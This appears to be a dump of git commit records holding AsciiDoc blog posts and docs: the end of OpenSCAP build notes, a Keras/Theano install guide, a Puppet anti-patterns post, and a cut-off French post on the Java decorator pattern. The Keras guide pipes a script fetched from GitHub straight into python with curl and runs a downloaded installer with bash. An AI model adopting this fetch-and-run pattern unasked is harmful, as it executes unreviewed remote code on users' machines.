it.\n\n----------------------------------------------------------------------------------\nExample: gcc myapp.c -I\/path\/to\/headers -L\/path\/to\/dynamic\/library -lcygopenscap-0\n----------------------------------------------------------------------------------\n\nIf you want to run your app, make sure ```cygopenscap-0.dll``` is either in\nworking directory or in PATH variable directories.\n\n=== Generating of code coverage\nCode coverage can be usefull during writing of test or performance profiling. \nWe could separate the process into five phases.\n\n1) *Get dependencies*\n\n # dnf install lcov\n\n2) *Run configure & make*\n\nTo allow code to generate statistics, we need to compile it with specific flags.\n\n $ .\/configure CFLAGS=\"--coverage\" LDFLAGS=-lgcov --enable-debug\n $ make\n\n3) *Run code.*\n\nIn this phase we should run code. We can run it directly or via test suite.\n\n $ .\/run .\/utils\/.libs\/oscap\n\n4) *Generate and browse results*\n\n $ lcov -t \"OpenSCAP coverage\" -o .\/coverage.info -c -d .\n $ genhtml -o .\/coverage .\/coverage.info\n $ xdg-open .\/coverage\/index.html # open results in browser\n\n5) *Clean stats*\n\nEvery run only modify our current statistics and not rewrite them completely.\nIf we want to generate new statistics, we should remove the old ones.\n \n $ lcov --directory .\/ --zerocounters ; find .\/ -name \"*.gcno\" | xargs rm\n $ rm -rf .\/coverage\n\n=== Building OpenSCAP for Windows (cross-compilation)\nBuilding OpenSCAP for Windows without a POSIX emulation layer is currently not\npossible. However, we are close to a native port of OpenSCAP for Windows. If you\nwant to help us solve the remaining problems. Instructions for cross-compiling\nOpenSCAP for Windows:\n\n1) Install the cross-compiler & dependencies\n\n-------------------------------------------------------------\n # yum install mingw32-gcc mingw32-binutils mingw32-libxml2 \\\n mingw32-libgcrypt mingw32-pthreads mingw32-libxslt \\\n mingw32-curl mingw32-pcre \\\n automake autoconf libtool\n-------------------------------------------------------------\n\n2) Checkout the portable branch of the OpenSCAP repository\n\n----------------------------------------------------------------------\n $ git clone -b portable git:\/\/git.fedorahosted.org\/git\/openscap.git \\\n openscap-portable.git\n $ cd openscap-portable.git\/\n----------------------------------------------------------------------\n\n3) Prepare the build\n\n------------------------------------------------------\n $ .\/autogen.sh\n $ mingw32-configure --disable-probes --disable-python\n------------------------------------------------------\n\n4) Build!\n\n------------------------------\n $ make -k 2> build-errors.log\n------------------------------\n\n5) Inspect build-errors.log for problems\n\n-----------------------------------------------\n $ grep -E '(error:|implicit)' build-errors.log\n-----------------------------------------------\n\n--------------------------------------------------------------------------\noscap_acquire.c:32:17: fatal error: ftw.h: No such file or directory\nrbt_i32.c:36:9: warning: implicit declaration of function 'posix_memalign'\nrbt_i64.c:35:9: warning: implicit declaration of function 'posix_memalign'\nrbt_str.c:39:9: warning: implicit declaration of function 'posix_memalign'\ntailoring.c:200:2: warning: implicit declaration of function 'strverscmp'\noscap-tool.c:37:17: fatal error: ftw.h: No such file or directory\noscap-oval.c:37:17: fatal error: ftw.h: No such file or directory\noscap-info.c:37:26: fatal error: linux\/limits.h: No such file or directory\n--------------------------------------------------------------------------\n\nWe need to solve the following problems:\n\n1. No implementation of ```strverscmp``` for Windows\n2. No implementation of ftw API for Windows\n3. Replace posix_memalign with a Windows API equivalent\n4. Get rid of ```linux\/limits.h``` dependency on Windows\n\nIf you would like to send us a patch solving one of these problems,\nplease consult the page about\nhttp:\/\/open-scap.org\/page\/Contribute[contributing to the OpenSCAP\nproject].\n\n\n=== OpenSCAP Reference Manual\nFor more information about OpenSCAP library, you can refer to this online\nreference manual: http:\/\/static.open-scap.org\/openscap-1.2\/[OpenSCAP\nreference manual]. This manual is included in a release tarball and can be\nregenerated from project sources by Doxygen documentation system.\n\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"b6774667f17b69d9d3003cfe6467a71041487377","subject":"Update 2015-11-10-Visual-Question-Answering-2.adoc","message":"Update 2015-11-10-Visual-Question-Answering-2.adoc","repos":"gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io","old_file":"_posts\/2015-11-10-Visual-Question-Answering-2.adoc","new_file":"_posts\/2015-11-10-Visual-Question-Answering-2.adoc","new_contents":"= Visual Question Answering 2\n:hp-tags: VQA, DNN, RNN, CNN, Python, Keras, Theano\n\n\nPrepare for VQA in Ubuntu 14.04 x64. +\nIn this Post, I want to install and test Keras. +\n\n\n[quote, Keras Documentation, ]\n____\nKeras is a minimalist, highly modular neural network library in the spirit of Torch, written in Python, that uses Theano under the hood for optimized tensor manipulation on GPU and CPU. It was developed with a focus on enabling fast experimentation.\n____\n \n{empty} +\n\nKeras uses the following dependencies: +\n\n. *numpy*\n. *scipy*\n. *pyyaml*\n. *Theano*\n. *HDF5* and *h5py* (optional, required if you use model saving\/loading functions)\n. Optional but recommended if you use CNNs: *cuDNN*\n\n=== Install miniconda\n\n[source,role=\"console\"]\n----\n$ wget https:\/\/repo.continuum.io\/miniconda\/Miniconda-latest-Linux-`uname -p`.sh\n$ bash Miniconda-latest-Linux-`uname -p`.sh\n$ source ~\/.bashrc\n----\nSee also link:http:\/\/conda.pydata.org\/docs\/install\/quick.html[the install guide].\n\n=== Install Theano\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n=== Install h5py\n\n[source,role=\"console\"]\n----\n$ conda install -y h5py\n----\n\n=== Install Keras\n\n[source,role=\"console\"]\n----\n$ pip install keras\n----\n\n=== Install g++ (optional)\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install g++\n----\n\nWithout g++, you will get this message when run Keras and Keras will be very slow.\n\n[source,role=\"console\"]\n----\nWARNING (theano.configdefaults): g++ not detected ! Theano will be unable to execute optimized C-implementations (for both CPU and GPU) and will default to Python implementations. Performance will be severely degraded. To remove this warning, set Theano flags cxx to an empty string.\n----\n\n=== Test Keras\n\n[source,role=\"console\"]\n----\n$ curl -sSL https:\/\/github.com\/fchollet\/keras\/raw\/master\/examples\/mnist_mlp.py | python\n----\n\nThe result here.\n\n[source,role=\"console\"]\n----\n60000 train samples\n10000 test samples\nTrain on 60000 samples, validate on 10000 samples\nEpoch 1\/20\n8s - loss: 0.4356 - acc: 0.8716 - val_loss: 0.1863 - val_acc: 0.9421\nEpoch 2\/20\n7s - loss: 0.1961 - acc: 0.9414 - val_loss: 0.1274 - val_acc: 0.9601\nEpoch 3\/20\n7s - loss: 0.1451 - acc: 0.9564 - val_loss: 0.1010 - val_acc: 0.9691\nEpoch 4\/20\n8s - loss: 0.1189 - acc: 0.9642 - val_loss: 0.0847 - val_acc: 0.9752\nEpoch 5\/20\n8s - loss: 0.1019 - acc: 0.9691 - val_loss: 0.0850 - val_acc: 0.9735\nEpoch 6\/20\n8s - loss: 0.0903 - acc: 0.9721 - val_loss: 0.0749 - val_acc: 0.9777\nEpoch 7\/20\n8s - loss: 0.0822 - acc: 0.9745 - val_loss: 0.0753 - val_acc: 0.9762\nEpoch 8\/20\n7s - loss: 0.0758 - acc: 0.9762 - val_loss: 0.0743 - val_acc: 0.9796\nEpoch 9\/20\n7s - loss: 0.0705 - acc: 0.9780 - val_loss: 0.0720 - val_acc: 0.9784\nEpoch 10\/20\n8s - loss: 0.0648 - acc: 0.9790 - val_loss: 0.0688 - val_acc: 0.9793\nEpoch 11\/20\n8s - loss: 0.0592 - acc: 0.9819 - val_loss: 0.0663 - val_acc: 0.9797\nEpoch 12\/20\n8s - loss: 0.0567 - acc: 0.9824 - val_loss: 0.0677 - val_acc: 0.9815\nEpoch 13\/20\n8s - loss: 0.0536 - acc: 0.9833 - val_loss: 0.0711 - val_acc: 0.9796\nEpoch 14\/20\n8s - loss: 0.0520 - acc: 0.9834 - val_loss: 0.0684 - val_acc: 0.9806\nEpoch 15\/20\n9s - loss: 0.0500 - acc: 0.9837 - val_loss: 0.0664 - val_acc: 0.9807\nEpoch 16\/20\n7s - loss: 0.0471 - acc: 0.9850 - val_loss: 0.0683 - val_acc: 0.9809\nEpoch 17\/20\n7s - loss: 0.0449 - acc: 0.9856 - val_loss: 0.0682 - val_acc: 0.9812\nEpoch 18\/20\n8s - loss: 0.0433 - acc: 0.9860 - val_loss: 0.0675 - val_acc: 0.9813\nEpoch 19\/20\n7s - loss: 0.0401 - acc: 0.9869 - val_loss: 0.0683 - val_acc: 0.9819\nEpoch 20\/20\n8s - loss: 0.0383 - acc: 0.9874 - val_loss: 0.0705 - val_acc: 0.9820\nTest score: 0.0704572771238\nTest accuracy: 0.982\n----\n\n{empty} +\n{empty} +\n\n=== Error\n[NOTE]\n===============================\n\nWhen I installed Theano from miniconda, \n\n[source,role=\"console\"]\n----\n$ conda install -y theano\n----\n\n* keras-0.2.0\n* theano-0.7.0\n\ngot this error during th test. \n\n[source,role=\"console\"]\n----\nAttributeError: 'module' object has no attribute 'relu'\n----\n\nI solved the error by re-installing with pip from github. +\n\n[source,role=\"console\"]\n----\n$ conda uninstall theano\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n===============================\n\n{empty} +\n{empty} +\n\n''''\n\n=== References\n\n* http:\/\/ermaker.github.io\/blog\/2015\/09\/08\/get-started-with-keras-for-beginners.html\n* http:\/\/keras.io\/\n* http:\/\/conda.pydata.org\/docs\/install\/quick.html\n\n''''","old_contents":"= Visual Question Answering 2\n:hp-tags: VQA, DNN, RNN, CNN, Python, Keras, Theano\n\n\nPrepare for VQA in Ubuntu 14.04 x64. +\nIn this Post, I want to install and test Keras. +\n\n\n[quote, Keras Documentation, ]\n____\nKeras is a minimalist, highly modular neural network library in the spirit of Torch, written in Python, that uses Theano under the hood for optimized tensor manipulation on GPU and CPU. It was developed with a focus on enabling fast experimentation.\n____\n \n{empty} +\n\nKeras uses the following dependencies: +\n\n. *numpy*\n. *scipy*\n. *pyyaml*\n. *Theano*\n. *HDF5* and *h5py* (optional, required if you use model saving\/loading functions)\n. Optional but recommended if you use CNNs: *cuDNN*\n\n=== Install miniconda\n\n[source,role=\"console\"]\n----\n$ wget https:\/\/repo.continuum.io\/miniconda\/Miniconda-latest-Linux-`uname -p`.sh\n$ bash Miniconda-latest-Linux-`uname -p`.sh\n$ source ~\/.bashrc\n----\nSee also link:http:\/\/conda.pydata.org\/docs\/install\/quick.html[the install guide].\n\n=== Install Theano\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n=== Install h5py\n\n[source,role=\"console\"]\n----\n$ conda install -y h5py\n----\n\n=== Install Keras\n\n[source,role=\"console\"]\n----\n$ pip install keras\n----\n\n=== Install g++ (optional)\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install g++\n----\n\nWithout g++, you will get this message when run Keras and Keras will be very slow.\n\n[source,role=\"console\"]\n----\nWARNING (theano.configdefaults): g++ not detected ! Theano will be unable to execute optimized C-implementations (for both CPU and GPU) and will default to Python implementations. Performance will be severely degraded. To remove this warning, set Theano flags cxx to an empty string.\n----\n\n=== Test Keras\n\n[source,role=\"console\"]\n----\n$ curl -sSL https:\/\/github.com\/fchollet\/keras\/raw\/master\/examples\/mnist_mlp.py | python\n----\n\nThe result here.\n\n[source,role=\"console\"]\n----\n60000 train samples\n10000 test samples\nTrain on 60000 samples, validate on 10000 samples\nEpoch 1\/20\n8s - loss: 0.4356 - acc: 0.8716 - val_loss: 0.1863 - val_acc: 0.9421\nEpoch 2\/20\n7s - loss: 0.1961 - acc: 0.9414 - val_loss: 0.1274 - val_acc: 0.9601\nEpoch 3\/20\n7s - loss: 0.1451 - acc: 0.9564 - val_loss: 0.1010 - val_acc: 0.9691\nEpoch 4\/20\n8s - loss: 0.1189 - acc: 0.9642 - val_loss: 0.0847 - val_acc: 0.9752\nEpoch 5\/20\n8s - loss: 0.1019 - acc: 0.9691 - val_loss: 0.0850 - val_acc: 0.9735\nEpoch 6\/20\n8s - loss: 0.0903 - acc: 0.9721 - val_loss: 0.0749 - val_acc: 0.9777\nEpoch 7\/20\n8s - loss: 0.0822 - acc: 0.9745 - val_loss: 0.0753 - val_acc: 0.9762\nEpoch 8\/20\n7s - loss: 0.0758 - acc: 0.9762 - val_loss: 0.0743 - val_acc: 0.9796\nEpoch 9\/20\n7s - loss: 0.0705 - acc: 0.9780 - val_loss: 0.0720 - val_acc: 0.9784\nEpoch 10\/20\n8s - loss: 0.0648 - acc: 0.9790 - val_loss: 0.0688 - val_acc: 0.9793\nEpoch 11\/20\n8s - loss: 0.0592 - acc: 0.9819 - val_loss: 0.0663 - val_acc: 0.9797\nEpoch 12\/20\n8s - loss: 0.0567 - acc: 0.9824 - val_loss: 0.0677 - val_acc: 0.9815\nEpoch 13\/20\n8s - loss: 0.0536 - acc: 0.9833 - val_loss: 0.0711 - val_acc: 0.9796\nEpoch 14\/20\n8s - loss: 0.0520 - acc: 0.9834 - val_loss: 0.0684 - val_acc: 0.9806\nEpoch 15\/20\n9s - loss: 0.0500 - acc: 0.9837 - val_loss: 0.0664 - val_acc: 0.9807\nEpoch 16\/20\n7s - loss: 0.0471 - acc: 0.9850 - val_loss: 0.0683 - val_acc: 0.9809\nEpoch 17\/20\n7s - loss: 0.0449 - acc: 0.9856 - val_loss: 0.0682 - val_acc: 0.9812\nEpoch 18\/20\n8s - loss: 0.0433 - acc: 0.9860 - val_loss: 0.0675 - val_acc: 0.9813\nEpoch 19\/20\n7s - loss: 0.0401 - acc: 0.9869 - val_loss: 0.0683 - val_acc: 0.9819\nEpoch 20\/20\n8s - loss: 0.0383 - acc: 0.9874 - val_loss: 0.0705 - val_acc: 0.9820\nTest score: 0.0704572771238\nTest accuracy: 0.982\n----\n\n{empty} +\n{empty} +\n\n=== Error\n[NOTE]\n===============================\n\nWhen I installed Theano from miniconda, \n\n[source,role=\"console\"]\n----\n$ conda install -y theano\n----\n\n* keras-0.2.0\n* theano-0.7.0\n\ngot this error during th test. \n\n[source,role=\"console\"]\n----\nAttributeError: 'module' object has no attribute 'relu'\n----\n\nI solved the error by re-installing with pip from github. +\n\n[source,role=\"console\"]\n----\n$ conda uninstall theano\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n===============================\n\n\n\n''''\n\n=== References\n\n* http:\/\/ermaker.github.io\/blog\/2015\/09\/08\/get-started-with-keras-for-beginners.html\n* http:\/\/keras.io\/\n* http:\/\/conda.pydata.org\/docs\/install\/quick.html\n\n''''","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"a1bac63c9253b8dbf5646b3dd4fdf5c246336ddd","subject":"Update 2016-04-23-Puppet-Common-Anti-Patterns.adoc","message":"Update 2016-04-23-Puppet-Common-Anti-Patterns.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-04-23-Puppet-Common-Anti-Patterns.adoc","new_file":"_posts\/2016-04-23-Puppet-Common-Anti-Patterns.adoc","new_contents":"= Puppet - Common Anti-Patterns\n:hp-tags: Puppet, Automation, Configuration Management, Devops\n\nOver my years in the tech industry I've gained a lot of experience with Configuration Managemnt tools such as Puppet, Chef and Ansible. In this post I'd like to share with you my experience opinions and advice on using Puppet as a Configuration Management tool. Hopefully this helps some of you out there to beat Puppet into submission.\n\n== Everything in Manifests\n\nIn many beginners tutorials you get taught to put all your code in manifests such as `site.pp` or `nodes.pp`. For example:\n\n```\nnode 'puppetclient1.mydomain.net' {\n include httpd_class\n}\n\nnode 'puppetclient2.mydomain.net' {\n include nginx_class\n file {'\/opt\/deployment_script':\n ensure => 'file',\n owner => 'deploy',\n group => 'deploy',\n mode => '0750'\n }\n}\n\nnode default {\n package { 'perl': \n ensure => present\n }\n}\n```\n\nThis is great when you're just starting out with a few servers managed you think you get it. Then you add a few more servers, you start adding more node specific config and before you know it you've got 10'000 lines of hand-crafted artisanal Puppet code. Much of which is probably duplicated. This was common in the early deys af Puppet. It was how I started back with Puppet 0.24.\n\nAlthough, it's not the best idea to manage your infrastructure in this way it's actually a reasonably good way to very easily and simply bootstrap cloud instances. with separate manifests based on server type (`web.pp`, `app.pp`, `lb.pp` etc). These can than be applied using https:\/\/cloudinit.readthedocs.io\/en\/latest\/[cloudinit] to create an immutable bootstrapped node.\n\n== Monolithic `modules` Directory\n\nQuite often I see repos where either people have `puppet module install`'d straight into the `modules` directory or they've downloaded a module and extracted it there. They then commit the whole repo including their own modules mixed in with upstream modules into source control. This pattern has a few problems, you don't know what is a locally developed module and what is an upstream module and there's no way of easily seeing what versions of modules are deployed. It also adds a lot of extra code to your Puppet repository.\n\nAlthough this way works and you know that your module versions are pinned, there's tools out there that make it much easier to manage your Puppet modules such as http:\/\/librarian-puppet.com\/[librarian-puppet] and https:\/\/github.com\/puppetlabs\/r10k[r10k].\n\n== Configuration Data in Code\n\nWhen writing Puppet code it's sometimes tempting to hard-code things like IP addresses or node specific things. For example:\n```\nclass profile::base::dns{\n $dns_servers = ['192.168.1.1', '192.168.1.2']\n file { '\/etc\/resolv.conf':\n ensure => present,\n owner => 'root',\n group => 'root',\n mode => '0444',\n content => template('etc\/resolv.conf.erb')\n }\n}\n```\n\nThis works but the code isn't re-usable. If you deploy to a different network or DC are your DNS servers still the same? To improve reusablility, change the variable to be a class parameter:\n\n```\nclass profile::base::dns (\n $dns_servers = ['8.8.8.8', '8.8.4.4']\n){\n file { '\/etc\/resolv.conf':\n ensure => present,\n owner => 'root',\n group => 'root',\n mode => '0444',\n content => template('etc\/resolv.conf.erb')\n }\n}\n```\nThen you can specify environment (network, node, DC) specific things in Hiera:\n\n192.168.1.0.yaml:\n```\n---\nprofile::base::dns:\n dns_servers:\n - '192.168.1.1'\n - '192.168.1.2'\n```\n10.10.0.0.yaml:\n```\n---\nprofile::base::dns:\n dns_servers:\n - '10.10.0.1'\n - '10.10.1.1'\n```\n\n\n\n\n== Everything in Separate Repos\n\n== Misuse of Puppet Environments\n\n== Manually Deploying Puppet Code","old_contents":"= Puppet - Common Anti-Patterns\n:hp-tags: Puppet, Automation, Configuration Management, Devops\n\nOver my years in the tech industry I've gained a lot of experience with Configuration Managemnt tools such as Puppet, Chef and Ansible. In this post I'd like to share with you my experience opinions and advice on using Puppet as a Configuration Management tool. Hopefully this helps some of you out there to beat Puppet into submission.\n\n== Everything in Manifests\n\nIn many beginners tutorials you get taught to put all your code in manifests such as `site.pp` or `nodes.pp`. For example:\n\n```\nnode 'puppetclient1.mydomain.net' {\n include httpd_class\n}\n\nnode 'puppetclient2.mydomain.net' {\n include nginx_class\n file {'\/opt\/deployment_script':\n ensure => 'file',\n owner => 'deploy',\n group => 'deploy',\n mode => '0750'\n }\n}\n\nnode default {\n package { 'perl': \n ensure => present\n }\n}\n```\n\nThis is great when you're just starting out with a few servers managed you think you get it. Then you add a few more servers, you start adding more node specific config and before you know it you've got 10'000 lines of hand-crafted artisanal Puppet code. Much of which is probably duplicated. This was common in the early deys af Puppet. It was how I started back with Puppet 0.24.\n\nAlthough, it's not the best idea to manage your infrastructure in this way it's actually a reasonably good way to very easily and simply bootstrap cloud instances. with separate manifests based on server type (`web.pp`, `app.pp`, `lb.pp` etc). These can than be applied using https:\/\/cloudinit.readthedocs.io\/en\/latest\/[cloudinit] to create an immutable bootstrapped node.\n\n== Monolithic `modules` Directory\n\nQuite often I see repos where either people have `puppet module install`'d straight into the `modules` directory or they've downloaded a module and extracted it there. They then commit the whole repo including their own modules mixed in with upstream modules into source control. This pattern has a few problems, you don't know what is a locally developed module and what is an upstream module and there's no way of easily seeing what versions of modules are deployed. It also adds a lot of extra code to your Puppet repository.\n\nAlthough this way works and you know that your module versions are pinned, there's tools out there that make it much easier to manage your Puppet modules such as http:\/\/librarian-puppet.com\/[librarian-puppet] and https:\/\/github.com\/puppetlabs\/r10k[r10k].\n\n== Configuration Data in Code\n\n== Everything in Separate Repos\n\n== Misuse of Puppet Environments\n\n== Manually Deploying Puppet Code","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"00d4c49ae2e0289328228ea319e43f6693517f90","subject":"Update 2017-03-21-Pattern-Decorator-en-Java-8.adoc","message":"Update 2017-03-21-Pattern-Decorator-en-Java-8.adoc","repos":"tosun-si\/tosun-si.github.io,tosun-si\/tosun-si.github.io,tosun-si\/tosun-si.github.io,tosun-si\/tosun-si.github.io","old_file":"_posts\/2017-03-21-Pattern-Decorator-en-Java-8.adoc","new_file":"_posts\/2017-03-21-Pattern-Decorator-en-Java-8.adoc","new_contents":"= Pattern Decorator en Java 8\n:published_at: 2017-03-21\n:source-highlighter: highlightjs\n\n== 1) Introduction\n\nL'objectif de cette article est de parler d'un des pattern du GOF (gang of four) assez connu, qui est le decorator.\nCe patron de conception correspond \u00e0 un design pattern de type comportement (behavioural pattern).\n\nEn gros l'id\u00e9e de ce pattern est d'ajouter du comportement \u00e0 du code au runtime (c'est \u00e0 dire \u00e0 l'execution du code).\nCe pattern pr\u00e9sente de nombreux avantages car lorsque la conception a \u00e9t\u00e9 mise en place, il devient tr\u00e8s simple d'ajouter du comportement au code existant, ce qui le rend tr\u00e8s evolutif.\n\nAvant Java 8, malgr\u00e9 l'aspect interessant \u00e9voqu\u00e9 pr\u00e9c\u00e9dement, ce pattern n'\u00e9tait pas beaucoup utilis\u00e9 car le code n\u00e9cessaire \u00e0 sa mise en place \u00e9tait tr\u00e8s verbeux.\nEn effet le design de code \u00e9tait bas\u00e9 sur l'h\u00e9ritage, ce qui obligeait le d\u00e9veloppeur \u00e0 \u00e9crire une interface par d\u00e9corator, assez qu'une classe abstraite. La verbosit\u00e9 induite par ce type de d\u00e9v\u00e9loppement pouvait d\u00e9courager pas mal de d\u00e9veloppeurs.\n\nEn Java 8 avec l'apport des lambdas, nous allons montrer que le decorator est beaucoup plus simple \u00e0 impl\u00e9menter, moins verbeux, fonctionnel et plus lisible pour le client de l'API.\n\nL'article se d\u00e9compose en 2 partie consistant \u00e0 montrer le code et la conception du decorator avant et apr\u00e8s Java 8. En Java 8 nous montrerons diff\u00e9rentes techniques.\n\nL'exemple choisi pour illustrer ce pattern, est le calcul du b\u00e9n\u00e9fice d'une entreprise. Chaque nouveau decorator permettra d'ajouter un calcul au runtime \u00e0 la formule g\u00e9n\u00e9rale.\n\n== 2) Decorator en Java 7\n\nPremi\u00e8rement une interface d\u00e9finissant le contrat doit \u00eatre cr\u00e9\u00e9e, nous allons l'appeler ProfitCalculator (calculateur de b\u00e9n\u00e9fice). Voici le code de cette interface : \n\n[source,java]\n----\npublic interface ProfitCalculator {\n\n double calculate(double turnover);\n} \n----\n\nUn calculateur de profit dispose d'une m\u00e9thode abstraite \"calculate\", qui va appliquer un nouveau calcul au CA pass\u00e9 en param\u00e8tre.\n\nEnsuite il faut cr\u00e9er une classe abstraite que l'on va appeler AbstractProfitDecorator : \n\n[source,java]\n----\npublic abstract class AbstractProfitDecorator implements ProfitCalculator {\n\n private final ProfitCalculator profitCalculator;\n\n public AbstractProfitDecorator(ProfitCalculator profitCalculator) {\n this.profitCalculator = profitCalculator;\n }\n\n protected abstract double applyExpense(double turnover);\n\n @Override\n public double calculate(double turnover) {\n double profit = profitCalculator.calculate(turnover);\n return applyExpense(profit);\n }\n}\n----\n\nCette classe impl\u00e9mente l'interface pr\u00e9c\u00e9dente et doit donc proposer l'impl\u00e9mentation de la m\u00e9thode \"calculate(double turnover)\". \nChaque d\u00e9corator va appliquer une d\u00e9pense en proposant l'impl\u00e9mentation de la m\u00e9thode \"applyExpense(double turnover)\".\n\nUne subtilit\u00e9 est \u00e0 constater i\u00e7i, la classe prend \u00e9galement en param\u00e8tre l'interface \"ProfitCalculator\". \nEn effet, chaque decorator va appliquer le calcul du decorator qui le pr\u00e9c\u00e8de et va ensuite y ajouter son calcul \u00e0 lui. C'est ce comportement qui permet d'ajouter des traitements au runtime.\n\nNous allons commencer par une classe proposant un calcul par d\u00e9faut, appel\u00e9 \"DefaultProfitCalculator\". Il est en effet utile de commencer par une classe de type \"profitCalculator\" qui ne d\u00e9pend de rien lors de son instantiation. Ceci correspond au calcul initial des decorators : \n\n[source,java]\n----\npublic class DefaultProfitCalculator implements ProfitCalculator {\n\n @Override\n public double calculate(double turnover) {\n return Expenses.getTransportExpenses(turnover);\n }\n}\n----\n\nNous allons ensuite montrer le code des diff\u00e9rents decorators : \n\nCharges d'exploitation => OperatingExpensesDecorator : \n[source,java]\n----\npublic class OperatingExpensesDecorator extends AbstractProfitDecorator {\n\n public OperatingExpensesDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getOperatingExpenses(turnover);\n }\n}\n----\n\nR\u00e9mun\u00e9ration => RemunerationDecorator : \n[source,java]\n----\npublic class RemunerationDecorator extends AbstractProfitDecorator {\n\n public RemunerationDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getRemuneration(turnover);\n }\n}\n----\n\nD\u00e9penses exceptionnelles => ExceptionalExpensesDecorator : \n[source,java]\n----\npublic class ExceptionalExpensesDecorator extends AbstractProfitDecorator {\n\n public ExceptionalExpensesDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getExceptionalExpenses(turnover);\n }\n}\n----\n\nTaxes d\u00e9ductible => DeductibleTaxesDecorator : \n[source,java]\n----\npublic class DeductibleTaxesDecorator extends AbstractProfitDecorator {\n\n public DeductibleTaxesDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getDeductibleTaxes(turnover);\n }\n}\n----\n\nLe principe de chaque dcorator est le m\u00eame, chacun doit proposer une impl\u00e9mentation de la m\u00e9thide \"applyExpense\". Il est noter que les cas choisis ne refl\u00e8tent pas forcemment la r\u00e9alit\u00e9, mais servent juste d'exemple.\nUne \"garbage class\" appel\u00e9e Expenses contient des m\u00e9thodes statiques permettant de calculer chaque cas. Nous monterons cette classe un peu plus tard.\n\nNous allons d\u00e9sormais passer aux tests d'int\u00e9gration et \u00e0 l'appel des d\u00e9corators. \n\nLe premier test permet de composer tous les d\u00e9corators : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenComposingAllDecorators_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit =\n new ExceptionalExpensesDecorator(new RemunerationDecorator(new DeductibleTaxesDecorator(new OperatingExpensesDecorator(new DefaultProfitCalculator())))).calculate(turnover);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(32600);\n }\n----\n\nLe calcul commence de droite \u00e0 gauche, on commence par le DefaultProfitCalculator, enuite cette classe est pass\u00e9e en param\u00e8tre du d\u00e9corator OperatingExpensesDecorator et ainsi de suite.\nOperatingExpensesDecorator applique le calcul de DefaultProfitCalculator plus le sien.\n\nVoici un second test qui n'applique pas tous les d\u00e9corator, et montre qu'il est tr\u00e8s simple d'ajouter ou de supprimer un decorator au runtime. Le code peut ainsi \u00eatre \u00e9volutif : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenNotComposingAllDecorators_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = new RemunerationDecorator(new DeductibleTaxesDecorator(new OperatingExpensesDecorator(new DefaultProfitCalculator()))).calculate(turnover);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(34600);\n }\n----\n\nAu niveau du client de l'API, nous avons la confirmation que le pattern est inter\u00e9ssant \u00e0 utiliser de part sa souplesse et du fait qu'il est possible d'ajouter un nouveau calcul (ou dans un autre cas une nouvelle r\u00e8gle) juste en cr\u00e9ant un nouveau d\u00e9corator et sans casser tous la conception mise en place.\n\nCependant nous constatons que la mise en place de ce patron de conception, est tr\u00e8s verbeuse. Beaucoup de classes et de lignes de codes doivent \u00eatre \u00e9crites pour mettre en place ce type de design de code. \nDe plus, le fait qu'il soit orient\u00e9 h\u00e9ritage peut rendre sa compr\u00e9h\u00e9nsion compliqu\u00e9e. Tous ces \u00e9l\u00e9ments peuvent dissuader le d\u00e9veloppeur \u00e0 mettre en place ce type de conception.\n\nUn des exemples de l'utilisation de ce pattern dans le JDK est la classe .....\n\nNous allons voir dans la deuxi\u00e8me partie comment refaire le pattern decorator en Java 8 avec des lambdas et des fonctions; et de montrer que l'\u00e9criture est beaucoup plus simple et beaucoup moins verbeuse.\n\n== 2) Decorator en Java 8\n\nNous allons commencer par montrer les m\u00e9thodes statiques propos\u00e9es par la garbage classe Expenses : \n\n[source,java]\n----\npublic class Expenses {\n\n public static double getTransportExpenses(final double turnover) {\n return turnover - 2400;\n }\n\n public static double getOperatingExpenses(final double turnover) {\n return turnover - 15000;\n }\n\n public static double getDeductibleTaxes(final double turnover) {\n return turnover - 3000;\n }\n\n public static double getRemuneration(final double turnover) {\n return turnover - 45000;\n }\n\n public static double getExceptionalExpenses(final double turnover) {\n return turnover - 2000;\n }\n}\n----\n\nChaque m\u00e9thode statique effectue le calcul souhait\u00e9 en prenant un double en param\u00e8tre et en retournant en sortie.\n\nNous allons ensuite montrer diff\u00e9rente fa\u00e7ons d'impl\u00e9menter ce pattern en Java 8.\n\n== a) Decorator en Java 8 avec de la composition de fonctions\n\nComme pour la partie Java 7, nous allons \u00e9crire une classe contenant le calcul par d\u00e9faut : \n\n[source,java]\n----\npublic class DefaultProfitCalculator implements DoubleUnaryOperator {\n\n @Override\n public double applyAsDouble(final double operand) {\n return Expenses.getTransportExpenses(operand);\n }\n}\n----\n\nCette classe impl\u00e9mente une interface fonctionnelle propos\u00e9e par d\u00e9faut dans le JDK 8 DoubleUnaryOperator. Cette fonction prend un double en entr\u00e9e et retourne un double en sortie, ce qui 